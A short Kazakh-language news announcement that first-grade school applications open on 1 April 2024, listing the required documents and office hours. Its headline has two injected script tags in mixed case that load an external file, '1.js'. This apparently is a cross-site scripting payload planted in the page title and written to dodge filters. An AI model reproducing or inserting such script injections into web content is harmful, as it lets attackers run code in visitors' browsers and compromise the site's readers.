1 СӘУІРДЕ БІРІНШІ СЫНЫПҚА ҚҰЖАТТАРДЫ ҚАБЫЛДАУ БАСТАЛАДЫ<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

01.04.2024

📆 Биыл бірінші сыныпқа өтініш қабылдау 1 сәуірде басталып, 2024 жылдың 31 тамызына дейін жалғасады, деп хабарлайды ҚР Оқу-ағарту министрлігінің баспасөз қызметі. 

Балалар бірінші сыныпқа алты жастан бастап ата - анасы немесе заңды өкілінің өтініші негізінде қабылданады. 

📎 Портал арқылы өтініш тапсыру үшін:
1) ата-аналардың немесе басқа заңды өкілдердің өтініші;
2) "Профилактикалық екпелер картасы" № 065/у нысанды және "Бала денсаулығының паспорты" № 052-2/у нысанды медициналық анықтамалар;
3) баланың 3х4 см өлшеміндегі цифрлық фотосуретi.

🗂️ Өтініш демалыс, түскі үзіліс және мереке күндерді қоспағанда,9:00-18:00 дүйсенбіден жұмаға дейін қабылданады.

Просмотров: 4868


Пікір қосу



Деректерді қолтаңбаға қосу